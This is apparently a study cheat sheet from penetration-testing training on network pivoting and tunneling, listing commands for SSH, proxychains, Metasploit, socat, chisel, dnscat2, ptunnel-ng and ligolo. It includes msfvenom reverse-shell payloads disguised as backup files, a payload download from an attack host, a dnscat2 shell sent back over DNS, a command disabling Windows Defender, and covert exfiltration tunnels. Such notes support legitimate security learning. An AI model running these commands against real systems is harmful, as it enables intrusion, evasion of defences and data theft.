Pivoting, Tunneling, and Port Forwarding
Ref: https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding
Enumeration
| Command |
Description |
ifconfig |
Linux-based command that displays all current network configurations of a system. |
ipconfig |
Windows-based command that displays all system network configurations. |
netstat -r |
Command used to display the routing table for all IPv4-based protocols. |
nmap -sT -p22,3306 <IPaddressofTarget> |
Nmap command used to scan a target for open ports allowing SSH or MySQL connections. |
ss -tl |
|
Port Forwarding
| Command |
Description |
| Ref: https://academy.hackthebox.com/module/158/section/1426 |
|
| SSH |
|
ssh -L 1234:localhost:3306 Ubuntu@<IPaddressofTarget> |
SSH comand used to create an SSH tunnel from a local machine on local port 1234 to a remote target using port 3306. |
netstat -antp | grep 1234 |
Netstat option used to display network connections associated with a tunnel created. Using grep to filter based on local port 1234 . |
nmap -v -sV -p1234 localhost |
Nmap command used to scan a host through a connection that has been made on local port 1234. |
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@<IPaddressofTarget> |
SSH command that instructs the ssh client to request the SSH server forward all data via port 1234 to localhost:3306. |
ssh -D 9050 ubuntu@<IPaddressofTarget> |
SSH command used to perform a dynamic port forward on port 9050 and establishes an SSH tunnel with the target. This is part of setting up a SOCKS proxy. |
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:80 ubuntu@<ipAddressofTarget> -vN |
SSH command used to create a reverse SSH tunnel from a target to an attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target. |
Proxies
| Command |
Description |
tail -4 /etc/proxychains.conf |
Linux-based command used to display the last 4 lines of /etc/proxychains.conf. Can be used to ensure socks configurations are in place. |
proxychains nmap -v -sn 172.16.5.1-200 |
Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against the hosts in the specified range 172.16.5.1-200 with increased verbosity (-v) disabling ping scan (-sn). |
proxychains nmap -v -Pn -sT 172.16.5.19 |
Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against 172.16.5.19 with increased verbosity (-v), disabling ping discover (-Pn), and using TCP connect scan type (-sT). |
proxychains msfconsole |
Uses Proxychains to open Metasploit and send all generated network traffic through a SOCKS proxy. |
proxychains xfreerdp /v:<IPaddressofTarget> /u:victor /p:pass@123 |
Used to connect to a target using RDP and a set of credentials using proxychains. This will send all traffic through a SOCKS proxy. |
Meterpreter
| Command |
Description |
| Ref: https://academy.hackthebox.com/module/158/section/1428 |
|
msf6 > search rdp_scanner |
Metasploit search that attempts to find a module called rdp_scanner. |
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080 |
Uses msfvenom to generate a Windows-based reverse HTTPS Meterpreter payload that will send a call back to the IP address specified following lhost= on local port 8080 (LPORT=8080). Payload will take the form of an executable file called backupscript.exe. |
msf6 > use exploit/multi/handler |
Used to select the multi-handler exploit module in Metasploit. |
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/ |
Uses secure copy protocol (scp) to transfer the file backupscript.exe to the specified host and places it in the Ubuntu user's home directory (:~/). |
python3 -m http.server 8123 |
Uses Python3 to start a simple HTTP server listening on port 8123. Can be used to retrieve files from a host. |
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" |
PowerShell command used to download a file called backupscript.exe from a webserver (172.16.5.129:8123) and then save the file to location specified after -OutFile. |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost -f elf -o backupjob LPORT=8080 |
Uses msfveom to generate a Linux-based Meterpreter reverse TCP payload that calls back to the IP specified after LHOST= on port 8080 (LPORT=8080). Payload takes the form of an executable elf file called backupjob. |
msf6> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 |
Metasploit command that runs a ping sweep module against the specified network segment (RHOSTS=172.16.5.0/23). |
msf6 > use auxiliary/server/socks_proxy |
Metasploit command that selects the socks_proxy auxiliary module. |
msf6 auxiliary(server/socks_proxy) > jobs |
Metasploit command that lists all currently running jobs. |
socks4 127.0.0.1 9050 |
Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 4 proxy is used in combination with proxychains on the specified IP address and port. |
Socks5 127.0.0.1 1080 |
Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 5 proxy is used in combination with proxychains on the specified IP address and port. |
msf6 > use post/multi/manage/autoroute |
Metasploit command used to select the autoroute module. |
Ping Sweep one liners
| Command |
Description |
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done |
For Loop used on a Linux-based system to discover devices in a specified network segment. |
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" |
For Loop used on a Windows-based system to discover devices in a specified network segment. |
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"} |
PowerShell one-liner used to ping addresses 1 - 254 in the specified network segment. |
Meterpreter portforwarding
| Command |
Description |
meterpreter > help portfwd |
Meterpreter command used to display the features of the portfwd command. |
meterpreter > portfwd add -l 3300 -p 3389 -r <IPaddressofTarget> |
Meterpreter-based portfwd command that adds a forwarding rule to the current Meterpreter session. This rule forwards network traffic on port 3300 on the local machine to port 3389 (RDP) on the target. |
xfreerdp /v:localhost:3300 /u:victor /p:pass@123 |
Uses xfreerdp to connect to a remote host through localhost:3300 using a set of credentials. Port forwarding rules must be in place for this to work properly. |
netstat -antp |
Used to display all (-a) active network connections with associated process IDs. -t displays only TCP connections.-n displays only numerical addresses. -p displays process IDs associated with each displayed connection. |
meterpreter > portfwd add -R -l 8081 -p 1234 -L <IPaddressofAttackHost> |
Meterpreter-based portfwd command that adds a forwarding rule that directs traffic coming on on port 8081 to the port 1234 listening on the IP address of the Attack Host. |
meterpreter > bg |
Meterpreter-based command used to run the selected metepreter session in the background. Similar to background a process in Linux |
socat
Socat is a bidirectional relay tool that can create pipe sockets between 2 independent network channels without needing to use SSH tunneling. It acts as a redirector that can listen on one host and port and forward that data to another IP address and port.
| Command |
Description |
| Ref: https://academy.hackthebox.com/module/158/section/1430 |
|
socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofAttackHost>:80 |
Uses Socat to listen on port 8080 and then to fork when the connection is received. It will then connect to the attack host on port 80. |
socat TCP4-LISTEN:8080,fork TCP4:<IPaddressofTarget>:8443 |
Uses Socat to listen on port 8080 and then to fork when the connection is received. Then it will connect to the target host on port 8443. |
SSH for Windows: plink.exe
Plink, short for PuTTY Link, is a Windows command-line SSH tool that comes as a part of the PuTTY package when installed. Similar to SSH, Plink can also be used to create dynamic port forwards and SOCKS proxies.
| Command |
Description |
plink -D 9050 ubuntu@<IPaddressofTarget> |
Windows-based command that uses PuTTY's Plink.exe to perform SSH dynamic port forwarding and establishes an SSH tunnel with the specified target. This will allow for proxy chaining on a Windows host, similar to what is done with Proxychains on a Linux-based host. |
Another Windows-based tool called Proxifier can be used to start a SOCKS tunnel via the SSH session. Proxifier is a Windows tool that creates a tunneled network for desktop client applications and allows it to operate through a SOCKS or HTTPS proxy and allows for proxy chaining. It is possible to create a profile
SSH Pivoting with Sshuttle
Sshuttle is another tool written in Python which removes the need to configure proxychains. However, this tool only works for pivoting over SSH and does not provide other options for pivoting over TOR or HTTPS proxy servers. Sshuttle can be extremely useful for automating the execution of iptables and adding pivot rules for the remote host.
| Command |
Description |
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0 -v |
Runs sshuttle, connects to the target host, and creates a route to the 172.16.5.0 network so traffic can pass from the attack host to hosts on the internal network (172.16.5.0). |
Rpivot
Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a corporate network to an external server and exposes the client's local port on the server-side.
| Command |
Description |
sudo git clone https://github.com/klsecservices/rpivot.git |
Clones the rpivot project GitHub repository. |
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 |
Used to run the rpivot server (server.py) on proxy port 9050, server port 9999 and listening on any IP address (0.0.0.0). (attack-host) |
scp -r rpivot ubuntu@<IPaddressOfTarget> |
Uses secure copy protocol to transfer an entire directory and all of its contents to a specified target. |
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 |
Used to run the rpivot client (client.py) to connect to the specified rpivot server on the appropriate port.(pivot host) |
proxychains firefox-esr <IPaddressofTargetWebServer>:80 |
Opens firefox with Proxychains and sends the web request through a SOCKS proxy server to the specified destination web server. |
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password> |
Use to run the rpivot client to connect to a web server that is using HTTP-Proxy with NTLM authentication. (pivot_host) |
netsh
Netsh is a Windows command-line tool that can help with the network configuration of a particular Windows system.
| Command |
Description |
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 |
Windows-based command that uses netsh.exe to configure a portproxy rule called v4tov4 that listens on port 8080 and forwards connections to the destination 172.16.5.25 on port 3389. |
netsh.exe interface portproxy show v4tov4 |
Windows-based command used to view the configurations of a portproxy rule called v4tov4. |
DNS Tunneling with Dnscat2
Dnscat2 is a tunneling tool that uses DNS protocol to send data between two hosts. It uses an encrypted Command-&-Control (C&C or C2) channel and sends data inside TXT records within the DNS protocol. Usually, every active directory domain environment in a corporate network will have its own DNS server, which will resolve hostnames to IP addresses and route the traffic to external DNS servers participating in the overarching DNS system. However, with dnscat2, the address resolution is requested from an external server. When a local DNS server tries to resolve an address, data is exfiltrated and sent over the network instead of a legitimate DNS request. Dnscat2 can be an extremely stealthy approach to exfiltrate data while evading firewall detections which strip the HTTPS connections and sniff the traffic.
| Command |
Description |
git clone https://github.com/iagox86/dnscat2.git |
Clones the dnscat2 project GitHub repository. |
sudo ruby dnscat2.rb --dns host=<attack_box>,port=53,domain=inlanefreight.local --no-cache |
Used to start the dnscat2.rb server running on the specified IP address, port (53) & using the domain inlanefreight.local with the no-cache option enabled. |
git clone https://github.com/lukebaggett/dnscat2-powershell.git |
Clones the dnscat2-powershell project Github repository. |
Import-Module dnscat2.ps1 |
PowerShell command used to import the dnscat2.ps1 tool. |
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret_from_server> -Exec cmd |
PowerShell command used to connect to a specified dnscat2 server using a IP address, domain name and preshared secret. The client will send back a shell connection to the server (-Exec cmd). |
dnscat2> ? |
Used to list dnscat2 options. |
dnscat2> window -i 1 |
Used to interact with an established dnscat2 session. |
Chisel
Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH. Chisel can create a client-server tunnel connection in a firewall restricted environment.
Ref:
# Go to directory
cd chisel
# Build the binary
go build
# Check size of binary
du -hs
# To compress binary during build
# '-s' to strip the binary of debug info and '-w' to remove DWARF info
go build -ldflags='-s -w'
# To compress
upx brute chisel
| Command |
Description |
./chisel server -v -p 1234 --socks5 |
Used to start a chisel server in verbose mode listening on port 1234 using SOCKS version 5. |
./chisel client -v 10.129.202.64:1234 socks |
Used to connect to a chisel server at the specified IP address & port using socks. |
ICMP echo tunnel with ptunnel
ICMP tunneling encapsulates your traffic within ICMP packets containing echo requests and responses. ICMP tunneling would only work when ping responses are permitted within a firewalled network. When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server. The external server can validate this traffic and send an appropriate response, which is extremely useful for data exfiltration and creating pivot tunnels to an external server.
ptunnel-ng tool to create a tunnel between our Ubuntu server and our attack host.
ptunnel-ng server on the target pivot host and client on attack host
| Command |
Description |
git clone https://github.com/utoni/ptunnel-ng.git |
Clones the ptunnel-ng project GitHub repository. |
sudo ./autogen.sh |
Used to run the autogen.sh shell script that will build the necessary ptunnel-ng files. |
sudo ./ptunnel-ng -r10.129.202.64 -R22 |
Used to start the ptunnel-ng server on the specified IP address (-r) and corresponding port (-R22). |
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 |
Used to connect to a specified ptunnel-ng server through local port 2222 (-l2222). |
Back on the attack host, we can attempt to connect to the ptunnel-ng server (-p <ipAddressofTarget>) but ensure this happens through local port 2222 (-l2222). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel. |
|
ssh -p2222 -lubuntu 127.0.0.1 |
SSH command used to connect to an SSH server through a local port. This can be used to tunnel SSH traffic through an ICMP tunnel. |
RDP and SOCKS Tunnelling
SocksOverRDP is an example of a tool that uses Dynamic Virtual Channels (DVC) from the Remote Desktop Service feature of Windows. DVC is responsible for tunneling packets over the RDP connection. Some examples of usage of this feature would be clipboard data transfer and audio sharing. However, this feature can also be used to tunnel arbitrary packets over the network. We can use SocksOverRDP to tunnel our custom packets and then proxy through it. We will use the tool Proxifier as our proxy server.
| Command |
Description |
Set-MpPreference -DisableRealtimeMonitoring $true |
Powershell command using to disable real time monitoring in Windows Defender |
regsvr32.exe SocksOverRDP-Plugin.dll |
Windows-based command used to register the SocksOverRDP-PLugin.dll. |
netstat -antb |findstr 1080 |
Windows-based command used to list TCP network connections listening on port 1080. |
Ligolo
Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve).
| Command |
Description |
sudo ip tuntap add user <user> mode tun ligolo |
To create tun interface named ligolo |
sudo ip link set ligolo up |
To turn ligolo interface up |
| proxy on attack box |
|
sudo ./proxy -selfcert |
To start proxy server with self signed certificate (not recommended) |
sudo ./proxy -autocert |
To start proxy server with auto generated tls cert |
| If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters. |
|
[Agent : ubuntu@WEB01] » session |
To list and select the session needed |
[Agent : ubuntu@WEB01] » start |
To start tunneling |
sudo ip route add <network_to_access> dev ligolo |
To configure ip address to use the ligolo interface |
| agent on jump box |
|
./agent -connect <attack_box_ip>:<server_port/default_port 11601> |
To start agent on jump box, use -ignore-cert when using self-signed cert |
[Agent : ubuntu@WEB01] » listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp |
Double pivot |
[Agent : ubuntu@WEB01] » listener_list |
To list all current listeners |